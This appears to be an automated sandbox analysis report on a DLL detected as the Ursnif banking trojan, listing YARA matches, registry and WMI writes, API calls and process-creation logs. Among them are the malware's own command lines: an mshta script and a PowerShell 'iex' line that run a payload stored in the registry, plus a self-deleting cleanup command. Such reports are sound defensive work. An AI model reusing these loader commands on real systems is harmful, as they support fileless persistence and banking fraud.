Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: uT9rwkGATJ.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A21B4	0_2_6E1A21B4
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B04C40	0_2_00B04C40
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B0AF24	0_2_00B0AF24
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B02B76	0_2_00B02B76
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00670C49	0_2_00670C49
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00670CBE	0_2_00670CBE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B5348B	0_2_00B5348B
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B51C14	0_2_00B51C14
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B571AA	0_2_00B571AA
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B561D5	0_2_00B561D5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B68D77	0_2_00B68D77
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B59F02	0_2_00B59F02
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B5135C	0_2_00B5135C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00570CBE	2_2_00570CBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_00570C49	2_2_00570C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02DA0CBE	3_2_02DA0CBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_02DA0C49	3_2_02DA0C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03349F02	3_2_03349F02
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0334135C	3_2_0334135C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0334EBA2	3_2_0334EBA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03358D77	3_2_03358D77
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_033471AA	3_2_033471AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_033461D5	3_2_033461D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03341C14	3_2_03341C14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0334348B	3_2_0334348B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02BD4C40	4_2_02BD4C40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02BDAF24	4_2_02BDAF24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02BD2B76	4_2_02BD2B76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00840CBE	4_2_00840CBE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00840C49	4_2_00840C49

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A13B8 GetProcAddress,NtCreateSection,memset,	0_2_6E1A13B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_6E1A15C6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A1273 NtMapViewOfSection,	0_2_6E1A1273
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A23D5 NtQueryVirtualMemory,	0_2_6E1A23D5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B094E8 NtMapViewOfSection,	0_2_00B094E8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B09269 GetProcAddress,NtCreateSection,memset,	0_2_00B09269
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B05D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_00B05D10
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B0B149 NtQueryVirtualMemory,	0_2_00B0B149
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B6F02A NtQueryInformationProcess,	0_2_00B6F02A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B5D5B8 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	0_2_00B5D5B8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B645D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	0_2_00B645D7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B60DD9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_00B60DD9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B665CE RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	0_2_00B665CE
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B6D103 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	0_2_00B6D103
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B5CC12 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	0_2_00B5CC12
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B7186D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_00B7186D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B5B9B9 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_00B5B9B9
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B6E9C2 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	0_2_00B6E9C2
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B662DC NtGetContextThread,RtlNtStatusToDosError,	0_2_00B662DC
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B5979A memset,NtQueryInformationProcess,	0_2_00B5979A
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B56F3E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	0_2_00B56F3E
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B76B6A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_00B76B6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0335420A GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	3_2_0335420A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0335D103 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	3_2_0335D103
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0334D5B8 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	3_2_0334D5B8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_033545D7 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	3_2_033545D7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03350DD9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	3_2_03350DD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_033565CE RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	3_2_033565CE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0335F02A NtQueryInformationProcess,	3_2_0335F02A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03346F3E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	3_2_03346F3E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03366B6A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_03366B6A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0334979A memset,NtQueryInformationProcess,	3_2_0334979A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_033562DC NtGetContextThread,RtlNtStatusToDosError,	3_2_033562DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0334B9B9 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_0334B9B9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0335E9C2 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	3_2_0335E9C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0334CC12 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	3_2_0334CC12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03360C0C NtQuerySystemInformation,RtlNtStatusToDosError,	3_2_03360C0C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0336186D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	3_2_0336186D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02BD5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_02BD5D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02BDB149 NtQueryVirtualMemory,	4_2_02BDB149

Source: hiiw3gsl.dll.31.dr	Static PE information: No import functions for PE file found
Source: uio4qdnj.dll.29.dr	Static PE information: No import functions for PE file found
Source: ebytp2em.dll.35.dr	Static PE information: No import functions for PE file found
Source: hjljqxud.dll.32.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\System32\loaddll32.exe

Section loaded: mspdb140.dll

Jump to behavior

Source: uT9rwkGATJ.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
